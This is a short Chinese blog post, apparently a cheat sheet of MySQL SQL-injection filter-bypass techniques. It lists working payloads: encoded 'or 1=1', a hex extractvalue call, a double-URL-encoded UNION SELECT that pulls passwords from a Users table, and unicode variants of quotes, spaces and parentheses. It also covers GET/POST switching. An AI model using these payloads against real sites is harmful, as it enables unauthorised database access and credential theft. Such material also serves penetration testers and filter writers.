Mysql注入绕过姿势

1.内联绕过

2.编码绕过，如URLEncode编码，ASCII,HEX,unicode编码绕过

or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

十六进制编码

SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))

双重编码绕过

?id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+

一些unicode编码举例：  
单引号：'
%u0027 %u02b9 %u02bc
%u02c8 %u2032
%uff07 %c0%27
%c0%a7 %e0%80%a7
空白：
%u0020 %uff00
%c0%20 %c0%a0 %e0%80%a0
左括号(:
%u0028 %uff08
%c0%28 %c0%a8
%e0%80%a8
右括号):
%u0029 %uff09
%c0%29 %c0%a9
%e0%80%a9

3.提交方式绕过，有的只过滤了GET却未对POST进行过滤

4.括号绕过空格：http://www.lijiejie.com/mysql-injection-bypass-waf-2/

参考文章：http://www.cnblogs.com/joy-nick/p/5774462.html

相关阅读:
将博客搬至CSDN
神州笔记本电脑【K670D】安装 Ubuntu18.04 系列操作
ValueError: Unknown label type: 'continuous'
Spark: JAVA_HOME is not set
IDEA 搭建 Spark 源码 (Ubuntu)
XX-Net 解决IPV6 不稳定，时好时坏。
解决SBT下载慢，dump project structure from sbt?
pip install kaggle 出现【网络不可达】？
Git clone 克隆Github上的仓库，速度慢？
进程间的通信方式

原文地址：https://www.cnblogs.com/xishaonian/p/6102556.html